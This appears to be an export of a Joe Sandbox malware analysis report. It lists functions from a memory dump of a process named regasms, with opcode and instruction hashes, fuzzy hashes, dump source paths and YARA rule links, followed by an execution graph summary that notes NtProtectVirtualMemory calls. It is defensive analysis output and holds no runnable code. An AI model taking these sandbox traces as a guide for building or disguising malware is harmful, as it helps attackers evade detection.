                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e2ff30cddb10b15f5c6e12b07c812da1cb311379824108f6f7bb173a3c9c650
                                  • Instruction ID: 2c370966811e1f9bc94966d9f032f3ea4a8e18c7e7d3aee856e49fb6a0038033
                                  • Opcode Fuzzy Hash: 3e2ff30cddb10b15f5c6e12b07c812da1cb311379824108f6f7bb173a3c9c650
                                  • Instruction Fuzzy Hash: 36018131604259BFDB054F64AC448AFBFBAFB892507008026F905C3351DB314C26DBA0
                                  Function 07B17D58 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1827992006313bae27b446ec60f26008660447b67e23e61488fc0b05bde3f9aa
                                  • Instruction ID: f3e4451520ca6b5a1d21cd893d0fb06b4797fcdb137f8144bf45ad28bd308341
                                  • Opcode Fuzzy Hash: 1827992006313bae27b446ec60f26008660447b67e23e61488fc0b05bde3f9aa
                                  • Instruction Fuzzy Hash: AC01F9F095C3C88FE3119634C4146A97FB29B43305F5480EED0458F582CB7A8987CB62
                                  Function 07B18F1C Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91e9a565aca6214fb49800772dac59a9bf8acd119c8cf44324af98bec08df088
                                  • Instruction ID: 2581f8f345e48f874fba9c2613ebcb97b7365849ff18b80dc27ae4238f70de8d
                                  • Opcode Fuzzy Hash: 91e9a565aca6214fb49800772dac59a9bf8acd119c8cf44324af98bec08df088
                                  • Instruction Fuzzy Hash: 94F059D282D380EFE3128BA898210723FB7F85B020BC049CBE047CF552E125440483A3
                                  Function 07B10DE8 Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef1713edce6c380efe6ff4d01236d2138641af38a7956533f477ab39df41a893
                                  • Instruction ID: 4ce9915f5457cf8f484b7eac70632e99d8325278c4ee6839a15d1264a6b17398
                                  • Opcode Fuzzy Hash: ef1713edce6c380efe6ff4d01236d2138641af38a7956533f477ab39df41a893
                                  • Instruction Fuzzy Hash: F80146B691460C9FDB00EFA8D844589BBB0FF56215F01C1ABE858DB121EB30C698CBA1
                                  Function 07B14DE0 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 829f101a5d46794d42e80a569f92ca0aecd667041e1cf48dcae596fb36844ec9
                                  • Instruction ID: f36e9a1b753328382602e2bdf647e5edec315ed33e5cf0dde67724f2d9a61bab
                                  • Opcode Fuzzy Hash: 829f101a5d46794d42e80a569f92ca0aecd667041e1cf48dcae596fb36844ec9
                                  • Instruction Fuzzy Hash: ABF0123570021AAF9B155F55E8448AFBFA6FB8D610710802AFE15C3350DB718C259B90
                                  Function 07B12800 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99f79787fcaec2a45717f61d0e80742b2e23dc4bcf98afa86bec7cbf21eaf25f
                                  • Instruction ID: e1ef84436565cad81ce6633d7a2c55e9cabaad8842638622f0d96d23e9fa9a1d
                                  • Opcode Fuzzy Hash: 99f79787fcaec2a45717f61d0e80742b2e23dc4bcf98afa86bec7cbf21eaf25f
                                  • Instruction Fuzzy Hash: 5CF0E231305700ABD7254B24A848D977F3AEFCA750B45C06AF5098B291DA308C02CBF0
                                  Function 07B1A2D0 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad363086a75d4ac40d1df44ee30b5af716ed3b707230b5b5d3f43a17dcd7fe8a
                                  • Instruction ID: 2b95b1740d9b57a92c20af580777d48f7bfc6b4aa782dfde1efc8bd26501d68e
                                  • Opcode Fuzzy Hash: ad363086a75d4ac40d1df44ee30b5af716ed3b707230b5b5d3f43a17dcd7fe8a
                                  • Instruction Fuzzy Hash: 8EF0E9B2604144BFDF15CF64EC5199E7FB6DF45160B0480EBE004CB261E6319D90C791
                                  Function 07B12810 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e02a31c4ebdf75bd9d8c9b0acc2ea742efd2e46ce38ef96299d6552492a9b6ae
                                  • Instruction ID: 13cc1f215d8a612df0d5e2ab025915684302b6a2bfac426bdfed39e6750562f2
                                  • Opcode Fuzzy Hash: e02a31c4ebdf75bd9d8c9b0acc2ea742efd2e46ce38ef96299d6552492a9b6ae
                                  • Instruction Fuzzy Hash: 07F082367002009BD3249F69F408E967BA6EBC9761F10C03AF649CB240DA31C806DBA0
                                  Function 07B1B8EA Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c33c4f73ec31fa1407455ce34a8655c754c7e9c2d1b8759e4181d96a8f9b4956
                                  • Instruction ID: 781c9d446bc0a46bb228cbcca82139bdd61f0c49f1fe4ffde996019555bf633b
                                  • Opcode Fuzzy Hash: c33c4f73ec31fa1407455ce34a8655c754c7e9c2d1b8759e4181d96a8f9b4956
                                  • Instruction Fuzzy Hash: 5DE0D1E192D28CDBBB21D6646C5217B3BBC97470A1FC406C7E80E87601D512095243F3
                                  Function 07B1AEEA Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03a5164cf8e24f85f365f5c7d825487e9ff4fbee48ceb6297dc1a8ecb2d97420
                                  • Instruction ID: ee939662539b91afdf32cc0b67a988f64f0ab9a4a2ee07c5160f71086c8c4769
                                  • Opcode Fuzzy Hash: 03a5164cf8e24f85f365f5c7d825487e9ff4fbee48ceb6297dc1a8ecb2d97420
                                  • Instruction Fuzzy Hash: 1EF0B4B0A55345DFEF019BB4CC4E9AEBB72AF57300F41C292E612AB2D1C7305815DB51
                                  Function 07B19E5B Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: babc2a4b20839f0f86826ac636cbf731b1da35564bc20f7917ef232bc597e739
                                  • Instruction ID: 20b7a80b1959d26ccfdbe0260e0f90d9279c896c95593869bcf95d1ff107cdbb
                                  • Opcode Fuzzy Hash: babc2a4b20839f0f86826ac636cbf731b1da35564bc20f7917ef232bc597e739
                                  • Instruction Fuzzy Hash: DBF089A161A3C28FE7135F78CC606A67FB1AF43104F5885DBC1D197293C6155C49C752
                                  Function 07B17D51 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4823469f8396553cc1a69982fefd8a7a1e37cc712adba19791688c525e9e3c97
                                  • Instruction ID: 1bbeda5ede872b56a82334d58be146dfee2e2f51e79ae3399e5c6d9630da3a9d
                                  • Opcode Fuzzy Hash: 4823469f8396553cc1a69982fefd8a7a1e37cc712adba19791688c525e9e3c97
                                  • Instruction Fuzzy Hash: 39F0A0F04991489EE350457495006757B67E78330EFA4C1E9D0594F182CA3F8883C662
                                  Function 07B1C0C8 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4182fa226c95a1ee8527170cbfe9b103882492693abdb12d160b6570f2bb6b6f
                                  • Instruction ID: 9ae92491b2b8cde0960e418844b2f5b5ed5b812cf84e119e74e84653ca089d1e
                                  • Opcode Fuzzy Hash: 4182fa226c95a1ee8527170cbfe9b103882492693abdb12d160b6570f2bb6b6f
                                  • Instruction Fuzzy Hash: 9EE0D8B09EC608DBE334CF64D81B7617F99FB4A301F80C1E6D507DA540C731484146A2
                                  Function 07B19D78 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a9d7731934635cd5249510805627d9bd4820485f72dbc1bc3845466f64a2898
                                  • Instruction ID: c3f0b6ecbf6717992e1ab08d00c50ed7735bb402d519926b8e3ace17bb0d9aa9
                                  • Opcode Fuzzy Hash: 6a9d7731934635cd5249510805627d9bd4820485f72dbc1bc3845466f64a2898
                                  • Instruction Fuzzy Hash: F1E0D86052C1C4CBF61CB564843D735B3567743201FD080F3800B5B585D92278044582
                                  Function 07B1C092 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d7c146e5f9e178b0717a55537bb8731d4bca66532733cc68b92548178d43c5
                                  • Instruction ID: 539b4ea3edcf482b62d3214a34259bd033be5b50cc4929363c964cebce8a1172
                                  • Opcode Fuzzy Hash: a3d7c146e5f9e178b0717a55537bb8731d4bca66532733cc68b92548178d43c5
                                  • Instruction Fuzzy Hash: F9D05ED55AD389EFF61196B4582C6BA3F6FD98B204F9544CBE10F8A142D912980503B3
                                  Function 07B18140 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45d93f9e68da8270c5eea0956a1fad0303d1965a53dbecab2a3cee869321f57e
                                  • Instruction ID: 307fbf6644775e02ab44234a5089a61676c045a98c92c580a06b8da4217535ba
                                  • Opcode Fuzzy Hash: 45d93f9e68da8270c5eea0956a1fad0303d1965a53dbecab2a3cee869321f57e
                                  • Instruction Fuzzy Hash: A5E092B41096428FE312DB64C8196267BB1FF47214F04C8CA84568B292CA30AC0AC795
                                  Function 07B1C0D8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61ff71ed658da65ac306191258d0a6bc250ceecd6a5548746c8f68549df422f4
                                  • Instruction ID: d218e156c6ffb4cda2051affe2e14cac5384d3214007a44f49557b33fcecb701
                                  • Opcode Fuzzy Hash: 61ff71ed658da65ac306191258d0a6bc250ceecd6a5548746c8f68549df422f4
                                  • Instruction Fuzzy Hash: 04D0CDB05EC508DBA3308B5554165313F9AD74F200F8081D29907D6240C62149510672
                                  Function 07B19D88 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e7bb4c3a732bfef4b0e38412c6787369da37319a345f47094a1e81ec9b7253b
                                  • Instruction ID: 5d84abba65b7090bbd09309f93cd560a822996e3cceb608839c0bc7891197956
                                  • Opcode Fuzzy Hash: 1e7bb4c3a732bfef4b0e38412c6787369da37319a345f47094a1e81ec9b7253b
                                  • Instruction Fuzzy Hash: 5DD0A7D063C1C4C7FA5C3678943DB3971A76B87311FD040E1910F86289ED23B8108293
                                  Function 07B1B8F8 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912a0c71023ca8bbd6ada5c2a4ffe937e841cf236fc042bd31056b2ba8f5c68a
                                  • Instruction ID: a96b89fba41c31b1d6a50e4d5cf7f59657480c2298ca4dc9fe627123ecff6395
                                  • Opcode Fuzzy Hash: 912a0c71023ca8bbd6ada5c2a4ffe937e841cf236fc042bd31056b2ba8f5c68a
                                  • Instruction Fuzzy Hash: 1FD05EE0A3C24CEB7A20EA99984123B32ADA74B1F1FD049C2A80B87300E921090353F3
                                  Function 07B1AE9E Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 050620c84f798c17af0f55e8a33c320413bffc19528e31cb26ea9365f5449aa5
                                  • Instruction ID: 83942b2afc0f31b64b94780930b3825d7d47c97073a4e8744cad73df4a65c37a
                                  • Opcode Fuzzy Hash: 050620c84f798c17af0f55e8a33c320413bffc19528e31cb26ea9365f5449aa5
                                  • Instruction Fuzzy Hash: DDE04FF19157468FD305CF64886626ABBB2BF43210F25C09AD01586215D7301815C792
                                  Function 07B1C2E0 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f570394f3996d21eae462ea72525c12e68438f40adeed2aad4b592251b883fc5
                                  • Instruction ID: dcda3b54c791e9ae9e9c19e01ae95a3dc7978871c81571851114041bb6713c35
                                  • Opcode Fuzzy Hash: f570394f3996d21eae462ea72525c12e68438f40adeed2aad4b592251b883fc5
                                  • Instruction Fuzzy Hash: 81D0A9D019C3CCEFAB1287A064650A13F382803104B8210E7E087AA883C402488AC3F3
                                  Function 07B10DF8 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f17b2522bf0f983177505c7406bfb525d4709c30b7ef6e2839d065eaab78eea8
                                  • Instruction ID: 572a978dd3f696fadc77149dc0e8a823aee69327503b8d18dc2a7661128ace35
                                  • Opcode Fuzzy Hash: f17b2522bf0f983177505c7406bfb525d4709c30b7ef6e2839d065eaab78eea8
                                  • Instruction Fuzzy Hash: E2E0E2B281060CEE8B80FE79D90459A7BE8AB05220F40C56AE8599A110EA30D2E8CF80
                                  Function 07B120D8 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6056cde3b3684b047ba02691f4aed3c2ff7d648b43b01dbb70fde5e6ce35c24c
                                  • Instruction ID: 1306bbf8c5084a407c617b6fdf9b33a0eacae8b1db1229a242774c945682ea6d
                                  • Opcode Fuzzy Hash: 6056cde3b3684b047ba02691f4aed3c2ff7d648b43b01dbb70fde5e6ce35c24c
                                  • Instruction Fuzzy Hash: 62D0A7B471030947A3046FB798173B637DEFB845457C5C018E209CA680CE34D851D715
                                  Function 07B16681 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3716368a7474ad4a42d393cb2a1b767484979ec4a4ad823d728c0a41e969e9c
                                  • Instruction ID: 4f5ea06ad85a9ce0056b1a75497ea185553a002750ae7c2067ff75a4973e7561
                                  • Opcode Fuzzy Hash: a3716368a7474ad4a42d393cb2a1b767484979ec4a4ad823d728c0a41e969e9c
                                  • Instruction Fuzzy Hash: AAD0126501C3E59FC32217A868090F7BF38590312878940C7F989CD453C95B58D1C2A2
                                  Function 07B1C0A0 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c60731b22ab3d8c0c83cb379d08c59a481743c82f246f4abcd7249d1a11468a3
                                  • Instruction ID: 6eea162b0218d017539997921d618baeec6443f457e1900fed584a257aa5838d
                                  • Opcode Fuzzy Hash: c60731b22ab3d8c0c83cb379d08c59a481743c82f246f4abcd7249d1a11468a3
                                  • Instruction Fuzzy Hash: D9C012D96FC648CBB01092A8241C6383F5E698F201FD040C7920F4A101DA1288010637
                                  Function 07B1A2A8 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 435c5ac394920e282c3f473a14d97e37cdeb3d3fca679c65be00c891ac1f70e3
                                  • Instruction ID: 8758f20b4eaa10a81c482435446109055de97a4976ed883da3092a870d9ef044
                                  • Opcode Fuzzy Hash: 435c5ac394920e282c3f473a14d97e37cdeb3d3fca679c65be00c891ac1f70e3
                                  • Instruction Fuzzy Hash: DBC08CF000A782EFE3039A20A8A84592F61AEA320038580C2C154872A3D422092DC3A3
                                  Function 07B1E318 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87fb2e41a9d9f5670f6e6fb930dd65a93d7be9ef5aea9b3960c4cca0087a0c38
                                  • Instruction ID: 77c881ed695eaf5fc31d339afb9862a362334466cb258246f6f4136de4d48daf
                                  • Opcode Fuzzy Hash: 87fb2e41a9d9f5670f6e6fb930dd65a93d7be9ef5aea9b3960c4cca0087a0c38
                                  • Instruction Fuzzy Hash: 4CC02BB104030ACBE2116BDCF70C32837BD9F00713F880052E60DD1030DB745080C626
                                  Function 07B1BCB0 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebd8add632e96f116688b98c4715fde6d80c0d8685e121a20d442cbfc12e9604
                                  • Instruction ID: b008b99b61a76bc4f1b0ed94b613eabd9e2330a959626a0d503c190226ebf8ae
                                  • Opcode Fuzzy Hash: ebd8add632e96f116688b98c4715fde6d80c0d8685e121a20d442cbfc12e9604
                                  • Instruction Fuzzy Hash: 84D012B5418154DFC700CB65DDD5C493FF0BE0E24071549CAD0059B222D330B411CB80
                                  Function 07B1C2F0 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e0cc8e3f01f315ad389e09353ddde2da8e037c0d8823d54b263d3e3d65f2ab30
                                  • Instruction ID: b13f64471ea85ebd35b19dff825ea811719190fb559247654e21ce040c4e67ef
                                  • Opcode Fuzzy Hash: e0cc8e3f01f315ad389e09353ddde2da8e037c0d8823d54b263d3e3d65f2ab30
                                  • Instruction Fuzzy Hash: E2B012E51FC24CC3351023D460281353F1C300BA00FC000D2A20F70C001901185100F3
                                  Function 07B1770C Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dace693e92c4fc87ff3bb19a49c49a25aee8422216f9e601c52901b02ea8acd0
                                  • Instruction ID: a44c4047b461e4a22edd7b9223076cf8f5c9db5ba648befeaed24253521b6980
                                  • Opcode Fuzzy Hash: dace693e92c4fc87ff3bb19a49c49a25aee8422216f9e601c52901b02ea8acd0
                                  • Instruction Fuzzy Hash: 25B012B51B9701E7B10167F44C85A2A5150EBB2B00FC0CDC633481006099755469D317
                                  Function 07B1B9C1 Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61180c2a3faa26a2c19e90ee1edc1f58484dff1895ab35a943bb6a3b440d047
                                  • Instruction ID: c84f43d2f59c88a07e981a42c59f15b678d85a33140a192cbe5cc41f66730c0d
                                  • Opcode Fuzzy Hash: a61180c2a3faa26a2c19e90ee1edc1f58484dff1895ab35a943bb6a3b440d047
                                  • Instruction Fuzzy Hash: 3CC08CF0BA0209EFEB008A10DF8296D32726B01E00F510051B2026A184D2605501CA40
                                  Function 07B16690 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78d82f78192f4ac627d1e91c98900bafe9b89f9397574a9be70c7478703e9274
                                  • Instruction ID: e63c14035c889345e961961ef971873d04ec91980bb8af80931e0d5ae3faa1e2
                                  • Opcode Fuzzy Hash: 78d82f78192f4ac627d1e91c98900bafe9b89f9397574a9be70c7478703e9274
                                  • Instruction Fuzzy Hash: DFA011A002820CCE22002288A0080BABB3C200220CBC00082EA0ACC008AEAA38208088

                                  Execution Graph

                                  Execution Coverage:30.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:100%
                                  Total number of Nodes:8
                                  Total number of Limit Nodes:0
                                  execution_graph 3057 fa32c8 3058 fa3316 NtProtectVirtualMemory 3057->3058 3060 fa3360 3058->3060 3061 fa2e73 3063 fa2eb6 3061->3063 3062 fa326a 3063->3062 3064 fa332f NtProtectVirtualMemory 3063->3064 3065 fa3360 3064->3065

                                  Executed Functions

                                  Function 00FA2E73 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 455nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
